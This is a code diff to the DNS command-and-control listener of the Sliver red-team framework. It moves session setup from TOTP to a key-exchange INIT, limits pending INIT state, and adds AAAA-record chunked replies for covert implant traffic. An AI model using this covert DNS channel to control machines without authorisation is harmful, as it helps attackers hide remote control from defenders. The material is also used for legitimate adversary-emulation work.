@@ -21,14 +21,12 @@ package c2
 
 	We've put a little effort to making the server at least not super easily fingerprintable,
 	though I'm guessing it's also still not super hard to do. The server must receive a valid
-	TOTP code before we start returning any non-error records. All requests must be formatted
-	as valid protobuf and contain a 24-bit "dns session ID" (16777216 possible values), and a
-	8 bit "message ID." The server only responds to non-TOTP queries with valid dns session IDs
-	16,777,216 can probably be bruteforced but it'll at least be slow.
+	protobuf and contain a 24-bit "dns session ID" (16777216 possible values), and a 8 bit
+	"message ID." 16,777,216 can probably be bruteforced but it'll at least be slow.
 
 	DNS command and control outline:
-		1. Implant sends TOTP encoded message to DNS server, server checks validity
-		2. DNS server responds with the "DNS Session ID" which is just some random value
+		1. Implant generates a random DNS Session ID and sends an INIT (Age key exchange)
+		2. DNS server validates INIT and allocates session state
 		3. Requests with valid DNS session IDs enable the server to respond with CRC32 responses
 		4. Implant establishes encrypted session
 
@@ -44,8 +42,8 @@ import (
 	"sort"
 	"strings"
 	"sync"
+	"sync/atomic"
 	"time"
-	"unicode"
 
 	consts "github.com/bishopfox/sliver/client/constants"
 	"github.com/bishopfox/sliver/protobuf/dnspb"
@@ -67,6 +65,17 @@ const (
 	messageIDBitMask = 0xff000000 // Bitwise mask to get the message ID
 
 	defaultMaxTXTLength = 254
+
+	// Upper bound on unauthenticated init reassembly state. INIT is split across multiple
+	// DNS queries, so we cap the number of pending init messages to avoid unbounded memory use.
+	defaultMaxPendingDNSInits = 1024
+
+	// Pending INIT messages are expected to complete quickly. If they don't, expire them.
+	defaultPendingDNSInitTTL        = 2 * time.Minute
+	defaultPendingDNSInitGCInterval = 30 * time.Second
+
+	// INIT carries only key-exchange material and should remain small.
+	defaultMaxDNSInitSize = 16 * 1024
 )
 
 var (
@@ -74,10 +83,12 @@ var (
 	implantBase64         = encoders.Base64{} // Implant's version of base64 with custom alphabet
 	ErrInvalidMsg         = errors.New("invalid dns message")
 	ErrNoOutgoingMessages = errors.New("no outgoing messages")
+	ErrMsgTooLong         = errors.New("too much data to encode")
+	ErrMsgTooShort        = errors.New("too little data to encode")
 )
 
 // StartDNSListener - Start a DNS listener
-func StartDNSListener(bindIface string, lport uint16, domains []string, canaries bool, enforceOTP bool) *SliverDNSServer {
+func StartDNSListener(bindIface string, lport uint16, domains []string, canaries bool) *SliverDNSServer {
 	// StartPivotListener()
 	server := &SliverDNSServer{
 		server:       &dns.Server{Addr: fmt.Sprintf("%s:%d", bindIface, lport), Net: "udp"},
@@ -85,8 +96,8 @@ func StartDNSListener(bindIface string, lport uint16, domains []string, canaries
 		messages:     &sync.Map{}, // In progress message streams
 		TTL:          0,
 		MaxTXTLength: defaultMaxTXTLength,
-		EnforceOTP:   enforceOTP,
 	}
+	server.startInitGC()
 	dnsLog.Infof("Starting DNS listener for %v (canaries: %v) ...", domains, canaries)
 	dns.HandleFunc(".", func(writer dns.ResponseWriter, req *dns.Msg) {
 		started := time.Now()
@@ -102,6 +113,10 @@ type DNSSession struct {
 	ImplantConn *core.ImplantConnection
 	CipherCtx   *cryptography.CipherContext
 
+	Created  time.Time
+	lastSeen atomic.Int64 // unix nanos
+
+	dnsIdMsgIdMap   map[uint32]uint32
 	outgoingMsgIDs  []uint32
 	outgoingBuffers map[uint32][]byte
 	outgoingMutex   *sync.RWMutex
@@ -111,6 +126,10 @@ type DNSSession struct {
 	msgCount          uint32
 }
 
+func (s *DNSSession) touch(now time.Time) {
+	s.lastSeen.Store(now.UnixNano())
+}
+
 func (s *DNSSession) msgID(id uint32) uint32 {
 	return uint32(id<<24) | uint32(s.ID)
 }
@@ -122,13 +141,15 @@ func (s *DNSSession) nextMsgID() uint32 {
 
 // StageOutgoingEnvelope - Stage an outgoing envelope
 func (s *DNSSession) StageOutgoingEnvelope(envelope *sliverpb.Envelope) error {
-	// dnsLog.Debugf("Staging outgoing envelope %v", envelope)
+	dnsLog.Debugf("Staging outgoing envelope %v", envelope)
 	plaintext, err := proto.Marshal(envelope)
 	if err != nil {
+		dnsLog.Errorf("[dns] failed to marshal outgoing message %s", err)
 		return err
 	}
 	ciphertext, err := s.CipherCtx.Encrypt(plaintext)
 	if err != nil {
+		dnsLog.Errorf("[dns] failed to encrypt outgoing message %s", err)
 		return err
 	}
 
@@ -143,7 +164,7 @@ func (s *DNSSession) StageOutgoingEnvelope(envelope *sliverpb.Envelope) error {
 
 // PopOutgoingMsgID - Pop the next outgoing message ID, FIFO
 // returns msgID, len, err
-func (s *DNSSession) PopOutgoingMsgID() (uint32, uint32, error) {
+func (s *DNSSession) PopOutgoingMsgID(msg *dnspb.DNSMessage) (uint32, uint32, error) {
 	s.outgoingMutex.Lock()
 	defer s.outgoingMutex.Unlock()
 	if len(s.outgoingMsgIDs) == 0 {
@@ -155,6 +176,8 @@ func (s *DNSSession) PopOutgoingMsgID() (uint32, uint32, error) {
 	if !ok {
 		return 0, 0, errors.New("no buffer for msg id")
 	}
+	//Necessary for any race conditions for resolvers that send out multiple identical requests
+	s.dnsIdMsgIdMap[msg.ID] = msgID
 	return msgID, uint32(len(ciphertext)), nil
 }
 
@@ -250,6 +273,13 @@ type PendingEnvelope struct {
 	complete bool
 }
 
+// pendingInit tracks the reassembly state for an INIT message (which may arrive
+// split across multiple DNS queries).
+type pendingInit struct {
+	Created  time.Time
+	Envelope *PendingEnvelope
+}
+
 // Reassemble - Reassemble a completed message
 func (p *PendingEnvelope) Reassemble() ([]byte, error) {
 	// There's some weird race here with a nil pointer
@@ -266,10 +296,10 @@ func (p *PendingEnvelope) Reassemble() ([]byte, error) {
 	if 1 < len(keys) {
 		sort.Slice(keys, func(i, j int) bool { return keys[i] < keys[j] })
 	}
-	dnsLog.Debugf("[dns] reassemble from: %v", keys)
-	for index, k := range keys {
-		dnsLog.Debugf("[dns] reassemble %d (%d->%d): %d bytes",
-			index, len(buffer), len(buffer)+len(p.messages[k]), len(p.messages[k]))
+	// dnsLog.Debugf("[dns] reassemble from: %v", keys)
+	for _, k := range keys {
+		// dnsLog.Debugf("[dns] reassemble %d (%d->%d): %d bytes",
+		// 	index, len(buffer), len(buffer)+len(p.messages[k]), len(p.messages[k]))
 		buffer = append(buffer, p.messages[k]...)
 	}
 	if len(buffer) != int(p.Size) {
@@ -286,8 +316,8 @@ func (p *PendingEnvelope) Insert(dnsMsg *dnspb.DNSMessage) bool {
 		return false // Already complete
 	}
 	p.messages[dnsMsg.Start] = bytes.NewBuffer(dnsMsg.Data).Bytes()
-	dnsLog.Debugf("[dns] msg id: %d, %d->%d, recv: %d of %d",
-		dnsMsg.ID, dnsMsg.Start, int(dnsMsg.Start)+len(dnsMsg.Data), p.received, p.Size)
+	// dnsLog.Debugf("[dns] msg id: %d, %d->%d, recv: %d of %d",
+	// 	dnsMsg.ID, dnsMsg.Start, int(dnsMsg.Start)+len(dnsMsg.Data), p.received, p.Size)
 
 	total := uint32(0)
 	for k := range p.messages {
@@ -295,9 +325,9 @@ func (p *PendingEnvelope) Insert(dnsMsg *dnspb.DNSMessage) bool {
 	}
 	p.received = total
 	p.complete = p.received >= p.Size
-	if p.complete {
-		dnsLog.Debugf("[dns] message complete %d of %d", p.received, p.Size)
-	}
+	// if p.complete {
+	// 	dnsLog.Debugf("[dns] message complete %d of %d", p.received, p.Size)
+	// }
 	return p.complete
 }
 
@@ -310,11 +340,23 @@ type SliverDNSServer struct {
 	messages     *sync.Map
 	TTL          uint32
 	MaxTXTLength int
-	EnforceOTP   bool
+
+	pendingInits atomic.Int64
+	gcStopOnce   sync.Once
+	gcStop       chan struct{}
+	gcDone       chan struct{}
 }
 
 // Shutdown - Shutdown the DNS server
 func (s *SliverDNSServer) Shutdown() error {
+	s.gcStopOnce.Do(func() {
+		if s.gcStop != nil {
+			close(s.gcStop)
+			if s.gcDone != nil {
+				<-s.gcDone
+			}
+		}
+	})
 	return s.server.Shutdown()
 }
 
@@ -323,6 +365,56 @@ func (s *SliverDNSServer) ListenAndServe() error {
 	return s.server.ListenAndServe()
 }
 
+func (s *SliverDNSServer) startInitGC() {
+	// Tests construct SliverDNSServer directly; only start GC for real listeners.
+	if s.gcStop != nil {
+		return
+	}
+	s.gcStop = make(chan struct{})
+	s.gcDone = make(chan struct{})
+	go func() {
+		ticker := time.NewTicker(defaultPendingDNSInitGCInterval)
+		defer ticker.Stop()
+		defer close(s.gcDone)
+
+		for {
+			select {
+			case <-ticker.C:
+				s.gcPendingInits()
+			case <-s.gcStop:
+				return
+			}
+		}
+	}()
+}
+
+func (s *SliverDNSServer) gcPendingInits() {
+	now := time.Now()
+	var deleted int64
+	s.messages.Range(func(key, value any) bool {
+		p, ok := value.(*pendingInit)
+		if !ok || p == nil {
+			if _, loaded := s.messages.LoadAndDelete(key); loaded {
+				deleted++
+			}
+			return true
+		}
+		created := p.Created
+		if created.IsZero() {
+			created = now
+		}
+		if now.Sub(created) > defaultPendingDNSInitTTL {
+			if _, loaded := s.messages.LoadAndDelete(key); loaded {
+				deleted++
+			}
+		}
+		return true
+	})
+	if deleted > 0 {
+		s.pendingInits.Add(-deleted)
+	}
+}
+
 // ---------------------------
 // DNS Handler
 // ---------------------------
@@ -348,6 +440,9 @@ func (s *SliverDNSServer) HandleDNSRequest(domains []string, canaries bool, writ
 		resp = s.handleCanary(req)
 	}
 	if resp != nil {
+		// These responses often have near-max-length QNAMEs. Enable compression to
+		// keep UDP responses under the minimum DNS message size limits.
+		resp.Compress = true
 		writer.WriteMsg(resp)
 	} else {
 		dnsLog.Infof("Invalid query, no DNS response")
@@ -378,24 +473,26 @@ func (s *SliverDNSServer) handleC2(domain string, req *dns.Msg) *dns.Msg {
 		return s.nameErrorResp(req)
 	}
 
-	// TOTP Handler can be called without dns session ID
-	if msg.Type == dnspb.DNSMessageType_TOTP {
-		return s.handleTOTP(domain, msg, req)
+	// INIT can be called without an existing server-side session. The server only
+	// stores session state after validating the key exchange.
+	if msg.Type == dnspb.DNSMessageType_INIT {
+		return s.handleDNSSessionInit(domain, msg, checksum, req)
 	}
 
 	// All other handlers require a valid dns session ID
-	_, ok := s.sessions.Load(msg.ID & sessionIDBitMask)
+	sessionValue, ok := s.sessions.Load(msg.ID & sessionIDBitMask)
 	if !ok {
 		dnsLog.Warnf("[dns] session not found for id %v (%v)", msg.ID, msg.ID&sessionIDBitMask)
 		return s.nameErrorResp(req)
 	}
+	if session, ok := sessionValue.(*DNSSession); ok && session != nil {
+		session.touch(time.Now())
+	}
 
 	// Msg Type -> Handler
 	switch msg.Type {
 	case dnspb.DNSMessageType_NOP:
 		return s.handleNOP(domain, msg, checksum, req)
-	case dnspb.DNSMessageType_INIT:
-		return s.handleDNSSessionInit(domain, msg, checksum, req)
 	case dnspb.DNSMessageType_POLL:
 		return s.handlePoll(domain, msg, checksum, req)
 	case dnspb.DNSMessageType_DATA_FROM_IMPLANT:
@@ -412,32 +509,17 @@ func (s *SliverDNSServer) handleC2(domain string, req *dns.Msg) *dns.Msg {
 // checksum calculation here to ensure that no one accidentally calculates the crc32
 // of the plaintext data (that would be very bad).
 func (s *SliverDNSServer) decodeSubdata(subdomain string) (*dnspb.DNSMessage, uint32, error) {
-	subdata := strings.Join(strings.Split(subdomain, "."), "")
+	subdata := strings.ToLower(strings.Join(strings.Split(subdomain, "."), ""))
 	dnsLog.Debugf("subdata = %s", subdata)
-	encoders := s.determineLikelyEncoders(subdata)
-	for _, encoder := range encoders {
-		data, err := encoder.Decode([]byte(subdata))
-		if err == nil {
-			msg := &dnspb.DNSMessage{}
-			err = proto.Unmarshal(data, msg)
-			if err == nil {
-				return msg, crc32.ChecksumIEEE(data), nil
-			}
-		}
-		dnsLog.Debugf("failed to decode subdata with %#v (%s)", encoder, err)
+	data, err := encoders.Base32{}.Decode([]byte(subdata))
+	if err != nil {
+		return nil, 0, ErrInvalidMsg
 	}
-	return nil, 0, ErrInvalidMsg
-}
-
-// Returns the most likely -> least likely encoders, if decoding fails fallback to
-// the next encoder until we run out of options.
-func (s *SliverDNSServer) determineLikelyEncoders(subdata string) []encoders.Encoder {
-	for _, char := range subdata {
-		if unicode.IsUpper(char) {
-			return []encoders.Encoder{encoders.Base58{}, encoders.Base32{}}
-		}
+	msg := &dnspb.DNSMessage{}
+	if err := proto.Unmarshal(data, msg); err != nil {
+		return nil, 0, ErrInvalidMsg
 	}
-	return []encoders.Encoder{encoders.Base32{}, encoders.Base58{}}
+	return msg, crc32.ChecksumIEEE(data), nil
 }
 
 func (s *SliverDNSServer) nameErrorResp(req *dns.Msg) *dns.Msg {
@@ -447,6 +529,13 @@ func (s *SliverDNSServer) nameErrorResp(req *dns.Msg) *dns.Msg {
 	return resp
 }
 
+func (s *SliverDNSServer) emptySuccessResp(req *dns.Msg) *dns.Msg {
+	resp := new(dns.Msg)
+	resp.SetReply(req)
+	resp.Authoritative = true
+	return resp
+}
+
 func (s *SliverDNSServer) refusedErrorResp(req *dns.Msg) *dns.Msg {
 	resp := new(dns.Msg)
 	resp.SetRcode(req, dns.RcodeRefused)
@@ -454,110 +543,113 @@ func (s *SliverDNSServer) refusedErrorResp(req *dns.Msg) *dns.Msg {
 	return resp
 }
 
-// ---------------------------
-// DNS Message Handlers
-// ---------------------------
-func (s *SliverDNSServer) handleTOTP(domain string, msg *dnspb.DNSMessage, req *dns.Msg) *dns.Msg {
-	dnsLog.Debugf("[dns] totp request: %v", msg)
-	totpCode := fmt.Sprintf("%08d", msg.ID)
-	if s.EnforceOTP {
-		valid, err := cryptography.ValidateTOTP(totpCode)
-		if err != nil || !valid {
-			dnsLog.Warnf("totp request invalid (%v)", err)
-			return s.nameErrorResp(req)
-		}
-		dnsLog.Debugf("[dns] totp request valid")
-	} else {
-		dnsLog.Warn("[dns] totp validation is disabled")
+func (s *SliverDNSServer) accumulateInitData(msg *dnspb.DNSMessage) ([]byte, bool, error) {
+	if msg.Size == 0 {
+		return nil, false, ErrInvalidMsg
 	}
+	if msg.Size > defaultMaxDNSInitSize {
+		return nil, false, ErrInvalidMsg
+	}
+	pendingValue, loaded := s.messages.Load(msg.ID)
+	if !loaded {
+		// Enforce a hard cap on pending INIT messages to prevent unbounded allocation.
+		next := s.pendingInits.Add(1)
+		if int64(defaultMaxPendingDNSInits) > 0 && next > int64(defaultMaxPendingDNSInits) {
+			s.pendingInits.Add(-1)
+			return nil, false, ErrInvalidMsg
+		}
 
-	dnsSessionID := dnsSessionID()
-	dnsLog.Debugf("[dns] Assigned new dns session id = %d", dnsSessionID&sessionIDBitMask)
-	s.sessions.Store(dnsSessionID&sessionIDBitMask, &DNSSession{
-		ID:                dnsSessionID & sessionIDBitMask,
-		outgoingMsgIDs:    []uint32{},
-		outgoingBuffers:   map[uint32][]byte{},
-		outgoingMutex:     &sync.RWMutex{},
-		incomingEnvelopes: map[uint32]*PendingEnvelope{},
-		incomingMutex:     &sync.Mutex{},
-		msgCount:          uint32(0),
-	})
-
-	resp := new(dns.Msg)
-	resp.SetReply(req)
-	resp.Authoritative = true
-	respBuf := make([]byte, 4)
-	binary.LittleEndian.PutUint32(respBuf, dnsSessionID)
-	for _, q := range req.Question {
-		switch q.Qtype {
-		case dns.TypeA:
-			a := &dns.A{
-				Hdr: dns.RR_Header{Name: q.Name, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: s.TTL},
-				A:   respBuf,
-			}
-			resp.Answer = append(resp.Answer, a)
+		pendingValue = &pendingInit{
+			Created: time.Now(),
+			Envelope: &PendingEnvelope{
+				Size:     msg.Size,
+				received: uint32(0),
+				messages: map[uint32][]byte{},
+				mutex:    &sync.Mutex{},
+				complete: false,
+			},
+		}
+		actual, loaded := s.messages.LoadOrStore(msg.ID, pendingValue)
+		if loaded {
+			// Another goroutine won the race. Roll back our pending counter.
+			s.pendingInits.Add(-1)
+			pendingValue = actual
 		}
 	}
-	return resp
-}
+	p, ok := pendingValue.(*pendingInit)
+	if !ok || p == nil || p.Envelope == nil {
+		s.deletePendingInit(msg.ID)
+		return nil, false, ErrInvalidMsg
+	}
+	pending := p.Envelope
+	if pending.Size != msg.Size && msg.Size != 0 {
+		s.deletePendingInit(msg.ID)
+		return nil, false, ErrInvalidMsg
+	}
+	if !pending.Insert(msg) {
+		return nil, false, nil
+	}
 
-func (s *SliverDNSServer) handleDNSSessionInit(domain string, msg *dnspb.DNSMessage, checksum uint32, req *dns.Msg) *dns.Msg {
-	dnsLog.Debugf("[session init] with dns session id %d", msg.ID&sessionIDBitMask)
-	loadSession, _ := s.sessions.Load(msg.ID & sessionIDBitMask)
-	dnsSession := loadSession.(*DNSSession)
-	dnsLog.Debugf("[session init] msg id: %d, size: %d", msg.ID, msg.Size)
-	pending := dnsSession.IncomingPendingEnvelope(msg.ID, msg.Size)
-	complete := pending.Insert(msg)
-	if !complete {
-		resp := new(dns.Msg)
-		resp.SetReply(req)
-		resp.Authoritative = true
-		// respBuf := []byte{}
-		for _, q := range req.Question {
-			switch q.Qtype {
-			case dns.TypeTXT:
-				txts := []string{}
-				txt := &dns.TXT{
-					Hdr: dns.RR_Header{Name: q.Name, Rrtype: dns.TypeTXT, Class: dns.ClassINET, Ttl: s.TTL},
-					Txt: txts,
-				}
-				resp.Answer = append(resp.Answer, txt)
-			}
-		}
-		return resp
+	if pending.received > pending.Size {
+		s.deletePendingInit(msg.ID)
+		return nil, false, ErrInvalidMsg
 	}
 
 	data, err := pending.Reassemble()
+	s.deletePendingInit(msg.ID)
 	if err != nil {
-		dnsLog.Errorf("[session init] failed to reassemble message %d: %s", msg.ID, err)
+		return nil, false, err
+	}
+	return data, true, nil
+}
+
+func (s *SliverDNSServer) deletePendingInit(id uint32) {
+	if _, loaded := s.messages.LoadAndDelete(id); loaded {
+		s.pendingInits.Add(-1)
+	}
+}
+
+func (s *SliverDNSServer) handleDNSSessionInit(domain string, msg *dnspb.DNSMessage, checksum uint32, req *dns.Msg) *dns.Msg {
+	sessionID := msg.ID & sessionIDBitMask
+	dnsLog.Debugf("[session init] with dns session id %d", sessionID)
+	if sessionID == 0 {
+		dnsLog.Warnf("[session init] invalid dns session id")
 		return s.refusedErrorResp(req)
 	}
-
-	if len(data) <= 32 {
+	if msg.Size <= 32 {
 		dnsLog.Warnf("[session init] invalid msg data length")
 		return s.refusedErrorResp(req)
 	}
-	if dnsSession.CipherCtx != nil {
-		dnsLog.Warnf("[session init] session is already initialized")
+	if existing, ok := s.sessions.Load(sessionID); ok {
+		// Defensive: INIT should only be called once per session ID.
+		if dnsSession, ok := existing.(*DNSSession); ok && dnsSession != nil && dnsSession.CipherCtx != nil {
+			dnsLog.Warnf("[session init] session is already initialized")
+			return s.refusedErrorResp(req)
+		}
+		dnsLog.Warnf("[session init] session already exists")
 		return s.refusedErrorResp(req)
 	}
 
+	initData, complete, err := s.accumulateInitData(msg)
+	if err != nil {
+		dnsLog.Errorf("[session init] error reassembling init data: %s", err)
+		return s.refusedErrorResp(req)
+	}
+	if !complete {
+		return s.emptySuccessResp(req)
+	}
+	msg.Data = initData
+
 	var publicKeyDigest [32]byte
-	copy(publicKeyDigest[:], data[:32])
-	implantConfig, err := db.ImplantConfigByECCPublicKeyDigest(publicKeyDigest)
-	if err != nil || implantConfig == nil {
+	copy(publicKeyDigest[:], msg.Data[:32])
+	implantBuild, err := db.ImplantBuildByPublicKeyDigest(publicKeyDigest)
+	if err != nil || implantBuild == nil {
 		dnsLog.Errorf("[session init] error implant public key not found")
 		return s.refusedErrorResp(req)
 	}
 
-	dnsLog.Infof("[session init] init data sent: %d bytes", len(data))
-
-	serverKeyPair := cryptography.ECCServerKeyPair()
-	sessionInit, err := cryptography.AgeKeyExFromImplant(
-		serverKeyPair.Private,
-		implantConfig.ECCPrivateKey,
-		data[32:],
-	)
+	serverKeyPair := cryptography.AgeServerKeyPair()
+	sessionInit, err := cryptography.AgeKeyExFromImplant(serverKeyPair.Private, implantBuild.PeerPrivateKey, msg.Data[32:])
 	if err != nil {
 		dnsLog.Errorf("[session init] error decrypting session init data: %s", err)
 		return s.refusedErrorResp(req)
@@ -568,7 +660,27 @@ func (s *SliverDNSServer) handleDNSSessionInit(domain string, msg *dnspb.DNSMess
 		return s.refusedErrorResp(req)
 	}
 
+	now := time.Now()
+	dnsSession := &DNSSession{
+		ID:                sessionID,
+		Created:           now,
+		dnsIdMsgIdMap:     map[uint32]uint32{},
+		outgoingMsgIDs:    []uint32{},
+		outgoingBuffers:   map[uint32][]byte{},
+		outgoingMutex:     &sync.RWMutex{},
+		incomingEnvelopes: map[uint32]*PendingEnvelope{},
+		incomingMutex:     &sync.Mutex{},
+		msgCount:          uint32(0),
+	}
+	dnsSession.touch(now)
 	dnsSession.ImplantConn = core.NewImplantConnection("dns", "n/a")
+	dnsSession.CipherCtx = cryptography.NewCipherContext(sessionKey)
+
+	if _, loaded := s.sessions.LoadOrStore(sessionID, dnsSession); loaded {
+		dnsLog.Warnf("[session init] session id collision for %d", sessionID)
+		return s.refusedErrorResp(req)
+	}
+
 	go func() {
 		dnsLog.Debugf("[dns] starting implant conn send loop")
 		for envelope := range dnsSession.ImplantConn.Send {
@@ -576,7 +688,6 @@ func (s *SliverDNSServer) handleDNSSessionInit(domain string, msg *dnspb.DNSMess
 		}
 		dnsLog.Debugf("[dns] closing implant conn send loop")
 	}()
-	dnsSession.CipherCtx = cryptography.NewCipherContext(sessionKey)
 	buf := make([]byte, 4)
 	binary.LittleEndian.PutUint32(buf, dnsSession.ID)
 	respData, err := dnsSession.CipherCtx.Encrypt(buf)
@@ -590,8 +701,26 @@ func (s *SliverDNSServer) handleDNSSessionInit(domain string, msg *dnspb.DNSMess
 	resp.Authoritative = true
 	for _, q := range req.Question {
 		switch q.Qtype {
+
+		case dns.TypeAAAA:
+
+			chunks := splitToChunks(respData, 16)
+			msg_len := len(respData)
+			dnsLog.Infof("[dns] msg length: %d)", msg_len)
+			for i, chunk := range chunks {
+				ttl := uint32(msg_len)
+				chunkIdx := uint32(i) << 8
+				ttl = ttl ^ chunkIdx
+				a_record := &dns.AAAA{
+					Hdr:  dns.RR_Header{Name: q.Name, Rrtype: dns.TypeAAAA, Class: dns.ClassINET, Ttl: ttl},
+					AAAA: chunk,
+				}
+				resp.Answer = append(resp.Answer, a_record)
+			}
+
 		case dns.TypeTXT:
-			respTxt := string(implantBase64.Encode(respData))
+			rawTxt, _ := implantBase64.Encode(respData)
+			respTxt := string(rawTxt)
 			txts := []string{}
 			for start, stop := 0, 0; stop < len(respTxt); start = stop {
 				stop += s.MaxTXTLength
@@ -614,29 +743,65 @@ func (s *SliverDNSServer) handlePoll(domain string, msg *dnspb.DNSMessage, check
 	dnsLog.Debugf("[poll] with dns session id %d", msg.ID&sessionIDBitMask)
 	loadSession, _ := s.sessions.Load(msg.ID & sessionIDBitMask)
 	dnsSession := loadSession.(*DNSSession)
+	dnsSession.touch(time.Now())
 
-	msgID, msgLen, err := dnsSession.PopOutgoingMsgID()
-	if err != nil && err != ErrNoOutgoingMessages {
-		dnsLog.Errorf("[poll] error popping outgoing msg id: %s", err)
-		return s.refusedErrorResp(req)
+	msgID, msgLen, err := dnsSession.PopOutgoingMsgID(msg)
+	if err != nil {
+		if err != ErrNoOutgoingMessages {
+			dnsLog.Errorf("[poll] error popping outgoing msg id: %s", err)
+			return s.refusedErrorResp(req)
+		} else {
+			msgLen = 0
+			msgID = 0
+			dnsLog.Debugf("[poll] error: %s", err)
+			oldID, ok := dnsSession.dnsIdMsgIdMap[msg.ID]
+			if !ok {
+				dnsLog.Debugf("[poll] no msg id for given request")
+			} else {
+				ciphertext, ok := dnsSession.outgoingBuffers[oldID]
+				if !ok {
+					dnsLog.Debugf("[poll] no msg for given id")
+				} else {
+					msgLen = uint32(len(ciphertext))
+					msgID = oldID
+				}
+			}
+
+		}
 	}
+
 	respData := []byte{}
-	if err == nil {
-		dnsLog.Debugf("[poll] manifest %d (%d bytes)", msgID, msgLen)
-		respData, _ = proto.Marshal(&dnspb.DNSMessage{
-			Type: dnspb.DNSMessageType_MANIFEST,
-			ID:   msgID,
-			Size: msgLen,
-		})
-	}
+	dnsLog.Debugf("[poll] manifest %d (%d bytes)", msgID, msgLen)
+	respData, _ = proto.Marshal(&dnspb.DNSMessage{
+		Type: dnspb.DNSMessageType_MANIFEST,
+		ID:   msgID,
+		Size: msgLen,
+	})
 
 	resp := new(dns.Msg)
 	resp.SetReply(req)
 	resp.Authoritative = true
 	for _, q := range req.Question {
 		switch q.Qtype {
+		case dns.TypeAAAA:
+
+			chunks := splitToChunks(respData, 16)
+			msg_len := len(respData)
+			dnsLog.Infof("[dns] msg length: %d)", msg_len)
+			for i, chunk := range chunks {
+				ttl := uint32(msg_len)
+				chunkIdx := uint32(i) << 8
+				ttl = ttl ^ chunkIdx
+				a_record := &dns.AAAA{
+					Hdr:  dns.RR_Header{Name: q.Name, Rrtype: dns.TypeAAAA, Class: dns.ClassINET, Ttl: ttl},
+					AAAA: chunk,
+				}
+				resp.Answer = append(resp.Answer, a_record)
+			}
+
 		case dns.TypeTXT:
-			respTxt := string(implantBase64.Encode(respData))
+			rawTxt, _ := implantBase64.Encode(respData)
+			respTxt := string(rawTxt)
 			txts := []string{}
 			for start, stop := 0, 0; stop < len(respTxt); start = stop {
 				stop += s.MaxTXTLength
@@ -652,6 +817,7 @@ func (s *SliverDNSServer) handlePoll(domain string, msg *dnspb.DNSMessage, check
 			resp.Answer = append(resp.Answer, txt)
 		}
 	}
+
 	return resp
 }
 
@@ -659,6 +825,7 @@ func (s *SliverDNSServer) handleDataFromImplant(domain string, msg *dnspb.DNSMes
 	dnsLog.Debugf("[from implant] dns session id %d", msg.ID&sessionIDBitMask)
 	loadSession, _ := s.sessions.Load(msg.ID & sessionIDBitMask)
 	dnsSession := loadSession.(*DNSSession)
+	dnsSession.touch(time.Now())
 	dnsLog.Debugf("[from implant] msg id: %d, size: %d", msg.ID, msg.Size)
 	pending := dnsSession.IncomingPendingEnvelope(msg.ID, msg.Size)
 	complete := pending.Insert(msg)
@@ -689,6 +856,7 @@ func (s *SliverDNSServer) handleDataToImplant(domain string, msg *dnspb.DNSMessa
 	dnsLog.Debugf("[to implant] dns session id %d", msg.ID&sessionIDBitMask)
 	loadSession, _ := s.sessions.Load(msg.ID & sessionIDBitMask)
 	dnsSession := loadSession.(*DNSSession)
+	dnsSession.touch(time.Now())
 
 	data, err := dnsSession.OutgoingRead(msg.ID, msg.Start, msg.Stop)
 	if err != nil {
@@ -707,8 +875,25 @@ func (s *SliverDNSServer) handleDataToImplant(domain string, msg *dnspb.DNSMessa
 	resp.Authoritative = true
 	for _, q := range req.Question {
 		switch q.Qtype {
+		case dns.TypeAAAA:
+
+			chunks := splitToChunks(respData, 16)
+			msg_len := len(respData)
+			dnsLog.Infof("[dns] msg length: %d)", msg_len)
+			for i, chunk := range chunks {
+				ttl := uint32(msg_len)
+				chunkIdx := uint32(i) << 8
+				ttl = ttl ^ chunkIdx
+				a_record := &dns.AAAA{
+					Hdr:  dns.RR_Header{Name: q.Name, Rrtype: dns.TypeAAAA, Class: dns.ClassINET, Ttl: ttl},
+					AAAA: chunk,
+				}
+				resp.Answer = append(resp.Answer, a_record)
+			}
+
 		case dns.TypeTXT:
-			respTxt := string(implantBase64.Encode(respData))
+			rawTxt, _ := implantBase64.Encode(respData)
+			respTxt := string(rawTxt)
 			txts := []string{}
 			for start, stop := 0, 0; stop < len(respTxt); start = stop {
 				stop += s.MaxTXTLength
@@ -731,6 +916,7 @@ func (s *SliverDNSServer) handleClear(domain string, msg *dnspb.DNSMessage, chec
 	dnsLog.Debugf("[clear] dns session id %d", msg.ID&sessionIDBitMask)
 	loadSession, _ := s.sessions.Load(msg.ID & sessionIDBitMask)
 	dnsSession := loadSession.(*DNSSession)
+	dnsSession.touch(time.Now())
 	dnsSession.ClearOutgoingEnvelope(msg.ID)
 
 	respBuf := make([]byte, 4)
@@ -748,7 +934,8 @@ func (s *SliverDNSServer) handleClear(domain string, msg *dnspb.DNSMessage, chec
 			}
 			resp.Answer = append(resp.Answer, a)
 		case dns.TypeTXT:
-			respTxt := string(implantBase64.Encode(respBuf))
+			rawTxt, _ := implantBase64.Encode(respBuf)
+			respTxt := string(rawTxt)
 			txts := []string{}
 			for start, stop := 0, 0; stop < len(respTxt); start = stop {
 				stop += s.MaxTXTLength
@@ -815,9 +1002,9 @@ func (s *SliverDNSServer) handleCanary(req *dns.Msg) *dns.Msg {
 					EventType: consts.CanaryEvent,
 				})
 				canary.Triggered = true
-				canary.FirstTrigger = time.Now()
+				canary.FirstTriggered = time.Now().Format(time.RFC1123)
 			}
-			canary.LatestTrigger = time.Now()
+			canary.LatestTrigger = time.Now().Format(time.RFC1123)
 			canary.Count++
 			generate.UpdateCanary(canary)
 		}
@@ -842,3 +1029,24 @@ func dnsSessionID() uint32 {
 	dnsSessionID := binary.LittleEndian.Uint32(randBuf)
 	return dnsSessionID
 }
+
+func splitToChunks(data []byte, chunkSize int) [][]byte {
+	var chunks [][]byte
+
+	for i := 0; i < len(data); i += chunkSize {
+		end := i + chunkSize
+
+		// If end is greater than the length of the data,
+		// adjust it to be the length of data to avoid slicing beyond.
+		if end > len(data) {
+			end = len(data)
+		}
+
+		chunk := make([]byte, chunkSize)
+		copy(chunk, data[i:end])
+
+		chunks = append(chunks, chunk)
+	}
+
+	return chunks
+}
